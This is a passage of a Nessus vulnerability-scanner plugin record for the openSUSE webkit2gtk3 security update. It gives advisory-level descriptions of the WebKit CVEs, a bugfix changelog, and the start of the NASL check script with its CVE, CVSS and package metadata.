- CVE-2018-4101: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function\n in the 'WebKit' component allowed attackers 
to trigger\n an assertion failure by leveraging improper array\n indexing (bsc#1088182)\n\n - CVE-2018-4114: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4117: An unspecified issue allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1088182, bsc#1102530).\n\n - CVE-2018-4118: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4119: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4120: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4121: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1092278).\n\n - CVE-2018-4122: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4125: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4127: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4128: An unspecified issue allowed remote\n 
attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4129: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4146: An unspecified issue allowed attackers to\n cause a denial of service (memory corruption) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4161: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4162: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4163: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4165: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693)\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An 
unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4246: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages type confusion (bsc#1104169) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandled\n an unset pageURL, leading to an application crash\n (bsc#1095611)\n\n - CVE-2018-4133: A Safari cross-site scripting (XSS)\n vulnerability allowed remote attackers to inject\n arbitrary web script or HTML via a crafted URL\n (bsc#1088182).\n\n - CVE-2018-11713: The libsoup network backend of WebKit\n unexpectedly failed to use system proxy settings for\n WebSocket connections. 
As a result, users could be\n deanonymized by crafted websites via a WebSocket\n connection (bsc#1096060).\n\n - CVE-2018-11712: The libsoup network backend of WebKit\n failed to perform TLS certificate verification for\n WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues :\n\n - Fixed a crash when atk_object_ref_state_set is called on\n an AtkObject that's being destroyed (bsc#1088932).\n\n - Fixed crash when using Wayland with QXL/virtio\n (bsc#1079512)\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\n - Do TLS error checking on\n GTlsConnection::accept-certificate to finish the load\n earlier in case of errors.\n\n - Properly close the connection to the nested wayland\n compositor in the Web Process.\n\n - Avoid painting backing stores for zero-opacity layers.\n\n - Fix downloads started by context menu failing in some\n websites due to missing user agent HTTP header.\n\n - Fix video unpause when GStreamerGL is disabled.\n\n - Fix several GObject introspection annotations.\n\n - Update user agent quirks to fix Outlook.com and\n Chase.com.\n\n - Fix several crashes and rendering issues.\n\n - Improve error message when Gigacage cannot allocate\n virtual memory.\n\n - Add missing WebKitWebProcessEnumTypes.h to\n webkit-web-extension.h.\n\n - Improve web process memory monitor thresholds.\n\n - Fix a web process crash when the web view is created and\n destroyed quickly.\n\n - Fix a network process crash when load is cancelled while\n searching for stored HTTP auth credentials.\n\n - Fix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and\n ENABLE_XSLT are 
disabled.\n\n - New API to retrieve and delete cookies with\n WebKitCookieManager.\n\n - New web process API to detect when form is submitted via\n JavaScript.\n\n - Several improvements and fixes in the touch/gestures\n support.\n\n - Support for the “system” CSS font family.\n\n - Complex text rendering improvements and fixes.\n\n - More complete and spec compliant WebDriver\n implementation.\n\n - Ensure DNS prefetching cannot be re-enabled if disabled\n by settings.\n\n - Fix seek sometimes not working.\n\n - Fix rendering of emojis that were using the wrong scale\n factor in some cases.\n\n - Fix rendering of combining enclosed keycap.\n\n - Fix rendering scale of some layers in HiDPI.\n\n - Fix a crash in Wayland when closing the web view.\n\n - Fix upower crashes when running inside a chroot\n or on systems with broken dbus/upower.\n\n - Fix memory leaks in GStreamer media backend when using\n GStreamer 1.14.\n\n - Fix several crashes and rendering issues.\n\n - Add ENABLE_ADDRESS_SANITIZER to make it easier to build\n with asan support.\n\n - Fix a crash under Wayland when using mesa software\n rasterization.\n\n - Make fullscreen video work again.\n\n - Fix handling of missing GStreamer elements.\n\n - Fix rendering when webm video is played twice.\n\n - Fix kinetic scrolling sometimes jumping around.\n\n - Fix build with ICU configured without collation support.\n\n - WebSockets use system proxy settings now (requires\n libsoup 2.61.90).\n\n - Show the context menu on long-press gesture.\n\n - Add support for Shift + mouse scroll to scroll\n horizontally.\n\n - Fix zoom gesture to actually zoom instead of changing\n the page scale.\n\n - Implement support for Graphics ARIA roles.\n\n - Make sleep inhibitors work under Flatpak.\n\n - Add get element CSS value command to WebDriver.\n\n - Fix a crash after a swipe gesture.\n\n - Fix several crashes and rendering issues.\n\n - Fix crashes due to duplicated symbols in\n libjavascriptcoregtk and 
libwebkit2gtk.\n\n - Fix parsing of timeout values in WebDriver.\n\n - Implement get timeouts command in WebDriver.\n\n - Fix deadlock in GStreamer video sink during shutdown\n when accelerated compositing is disabled.\n\n - Fix several crashes and rendering issues.\n\n - Add web process API to detect when form is submitted via\n JavaScript.\n\n - Add new API to replace\n webkit_form_submission_request_get_text_fields() that is\n now deprecated.\n\n - Add WebKitWebView::web-process-terminated signal and\n deprecate web-process-crashed.\n\n - Fix rendering issues when editing text areas.\n\n - Use FastMalloc based GstAllocator for GStreamer.\n\n - Fix web process crash at startup in bmalloc.\n\n - Fix several memory leaks in GStreamer media backend.\n\n - WebKitWebDriver process no longer links to\n libjavascriptcoregtk.\n\n - Fix several crashes and rendering issues.\n\n - Add new API to add, retrieve and delete cookies via\n WebKitCookieManager.\n\n - Add functions to WebSettings to convert font sizes\n between points and pixels.\n\n - Ensure cookie operations take effect when they happen\n before a web process has been spawned.\n\n - Automatically adjust font size when\n GtkSettings:gtk-xft-dpi changes.\n\n - Add initial resource load statistics support.\n\n - Add API to expose availability of certain editing\n commands in WebKitEditorState.\n\n - Add API to query whether a WebKitNavigationAction is a\n redirect or not.\n\n - Improve complex text rendering.\n\n - Add support for the 'system' CSS font family.\n\n - Disable USE_GSTREAMER_GL\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-26T00:00:00", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2018-1288)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4119", "CVE-2017-7161", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", 
"CVE-2017-7165", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4199", "CVE-2018-4163", "CVE-2018-12911", "CVE-2018-4120", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-11713", "CVE-2018-11712", "CVE-2018-4133", "CVE-2018-4162", "CVE-2017-7153", "CVE-2018-4125", "CVE-2017-7160", "CVE-2018-4233", "CVE-2018-4113", "CVE-2018-4222", "CVE-2017-13884", "CVE-2018-4127", "CVE-2018-4088", "CVE-2018-4204", "CVE-2018-4096", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4117", "CVE-2018-4161", "CVE-2017-13885", "CVE-2018-4232", "CVE-2018-4122", "CVE-2018-4200", "CVE-2018-4121"], "modified": "2018-10-26T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo"], "id": "OPENSUSE-2018-1288.NASL", "href": "https://www.tenable.com/plugins/nessus/118453", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, 
Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1288.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118453);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-11646\", \"CVE-2018-11712\", \"CVE-2018-11713\", \"CVE-2018-12911\", \"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4200\", \"CVE-2018-4204\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2018-1288)\");\n script_summary(english:\"Check for the openSUSE-2018-1288 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-12911: Fixed an off-by-one error in\n xdg_mime_get_simple_globs (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed 
remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote\n attackers to spoof user-interface information (about\n whether the entire content is derived from a valid TLS\n session) via a crafted website that sends a 401\n Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote\n attackers to execute arbitrary code via special\n characters that trigger command injection (bsc#1075775,\n bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free\n (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1092279).\n\n - CVE-2018-4101: An unspecified issue allowed remote\n attackers to execute arbitrary 
code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function\n in the 'WebKit' component allowed attackers to trigger\n an assertion failure by leveraging improper array\n indexing (bsc#1088182)\n\n - CVE-2018-4114: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4117: An unspecified issue allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1088182, bsc#1102530).\n\n - CVE-2018-4118: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4119: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4120: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4121: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1092278).\n\n - CVE-2018-4122: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4125: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4127: An unspecified issue allowed 
remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4128: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4129: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4146: An unspecified issue allowed attackers to\n cause a denial of service (memory corruption) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4161: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4162: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4163: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4165: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693)\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote\n 
attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4246: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages type confusion (bsc#1104169) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandled\n an unset pageURL, leading to an application crash\n (bsc#1095611)\n\n - CVE-2018-4133: A Safari cross-site scripting (XSS)\n vulnerability allowed remote attackers to inject\n arbitrary web script or HTML via a crafted URL\n (bsc#1088182).\n\n - CVE-2018-11713: The libsoup network backend of WebKit\n unexpectedly failed to use system proxy settings for\n WebSocket connections. 
As a result, users could be\n deanonymized by crafted websites via a WebSocket\n connection (bsc#1096060).\n\n - CVE-2018-11712: The libsoup network backend of WebKit\n failed to perform TLS certificate verification for\n WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues :\n\n - Fixed a crash when atk_object_ref_state_set is called on\n an AtkObject that's being destroyed (bsc#1088932).\n\n - Fixed crash when using Wayland with QXL/virtio\n (bsc#1079512)\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\n - Do TLS error checking on\n GTlsConnection::accept-certificate to finish the load\n earlier in case of errors.\n\n - Properly close the connection to the nested wayland\n compositor in the Web Process.\n\n - Avoid painting backing stores for zero-opacity layers.\n\n - Fix downloads started by context menu failing in some\n websites due to missing user agent HTTP header.\n\n - Fix video unpause when GStreamerGL is disabled.\n\n - Fix several GObject introspection annotations.\n\n - Update user agent quirks to fix Outlook.com and\n Chase.com.\n\n - Fix several crashes and rendering issues.\n\n - Improve error message when Gigacage cannot allocate\n virtual memory.\n\n - Add missing WebKitWebProcessEnumTypes.h to\n webkit-web-extension.h.\n\n - Improve web process memory monitor thresholds.\n\n - Fix a web process crash when the web view is created and\n destroyed quickly.\n\n - Fix a network process crash when load is cancelled while\n searching for stored HTTP auth credentials.\n\n - Fix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and\n ENABLE_XSLT are 
disabled.\n\n - New API to retrieve and delete cookies with\n WebKitCookieManager.\n\n - New web process API to detect when form is submitted via\n JavaScript.\n\n - Several improvements and fixes in the touch/gestures\n support.\n\n - Support for the “system” CSS font family.\n\n - Complex text rendering improvements and fixes.\n\n - More complete and spec compliant WebDriver\n implementation.\n\n - Ensure DNS prefetching cannot be re-enabled if disabled\n by settings.\n\n - Fix seek sometimes not working.\n\n - Fix rendering of emojis that were using the wrong scale\n factor in some cases.\n\n - Fix rendering of combining enclosed keycap.\n\n - Fix rendering scale of some layers in HiDPI.\n\n - Fix a crash in Wayland when closing the web view.\n\n - Fix upower crashes when running inside a chroot\n or on systems with broken dbus/upower.\n\n - Fix memory leaks in GStreamer media backend when using\n GStreamer 1.14.\n\n - Fix several crashes and rendering issues.\n\n - Add ENABLE_ADDRESS_SANITIZER to make it easier to build\n with asan support.\n\n - Fix a crash under Wayland when using mesa software\n rasterization.\n\n - Make fullscreen video work again.\n\n - Fix handling of missing GStreamer elements.\n\n - Fix rendering when webm video is played twice.\n\n - Fix kinetic scrolling sometimes jumping around.\n\n - Fix build with ICU configured without collation support.\n\n - WebSockets use system proxy settings now (requires\n libsoup 2.61.90).\n\n - Show the context menu on long-press gesture.\n\n - Add support for Shift + mouse scroll to scroll\n horizontally.\n\n - Fix zoom gesture to actually zoom instead of changing\n the page scale.\n\n - Implement support for Graphics ARIA roles.\n\n - Make sleep inhibitors work under Flatpak.\n\n - Add get element CSS value command to WebDriver.\n\n - Fix a crash after a swipe gesture.\n\n - Fix several crashes and rendering issues.\n\n - Fix crashes due to duplicated symbols in\n libjavascriptcoregtk and 
libwebkit2gtk.\n\n - Fix parsing of timeout values in WebDriver.\n\n - Implement get timeouts command in WebDriver.\n\n - Fix deadlock in GStreamer video sink during shutdown\n when accelerated compositing is disabled.\n\n - Fix several crashes and rendering issues.\n\n - Add web process API to detect when form is submitted via\n JavaScript.\n\n - Add new API to replace\n webkit_form_submission_request_get_text_fields() that is\n now deprecated.\n\n - Add WebKitWebView::web-process-terminated signal and\n deprecate web-process-crashed.\n\n - Fix rendering issues when editing text areas.\n\n - Use FastMalloc based GstAllocator for GStreamer.\n\n - Fix web process crash at startup in bmalloc.\n\n - Fix several memory leaks in GStreamer media backend.\n\n - WebKitWebDriver process no longer links to\n libjavascriptcoregtk.\n\n - Fix several crashes and rendering issues.\n\n - Add new API to add, retrieve and delete cookies via\n WebKitCookieManager.\n\n - Add functions to WebSettings to convert font sizes\n between points and pixels.\n\n - Ensure cookie operations take effect when they happen\n before a web process has been spawned.\n\n - Automatically adjust font size when\n GtkSettings:gtk-xft-dpi changes.\n\n - Add initial resource load statistics support.\n\n - Add API to expose availability of certain editing\n commands in WebKitEditorState.\n\n - Add API to query whether a WebKitNavigationAction is a\n redirect or not.\n\n - Improve complex text rendering.\n\n - Add support for the 'system' CSS font family.\n\n - Disable USE_GSTREAMER_GL\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1075775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1077535\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1079512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1088182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1088932\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092280\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1101999\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102530\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104169\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are 
available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n 
